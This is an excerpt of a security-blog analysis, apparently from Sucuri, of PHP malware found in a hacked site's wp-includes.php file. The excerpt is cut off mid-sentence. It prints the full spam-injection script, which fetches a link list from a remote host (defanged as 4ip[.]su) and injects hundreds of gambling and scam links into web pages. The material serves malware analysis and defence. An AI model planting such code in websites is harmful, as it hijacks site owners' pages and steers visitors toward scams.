all InfoSec news
Massive Google Colaboratory Abuse: Gambling and Subscription Scam
Sucuri Blog blog.sucuri.net
This investigation started with a small and quite simple piece of PHP malware found on a hacked website. We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file:
<?php
$lines = file('https://4ip[.]su/db/links.txt');
shuffle($lines);
$data = array_rand($lines, 900);
echo '<p>';
foreach($data as $value) {
$rand = substr(md5(microtime()),rand(0,26),6);
echo '<a href="'.$lines[$value].'">'.$rand.'</a> ';
};
echo '</p>';
?>
This script fetches a list of links from a remote location (hxxps://4ip[.]su/db/links.txt) and then injects some of them into …
abuse black hat tactics code data echo file foreach gambling google hacked hacked websites investigation links malware md5 php php malware piece rand responsible scam seo spam shuffle simple subscription sucuri labs value website website malware infections website security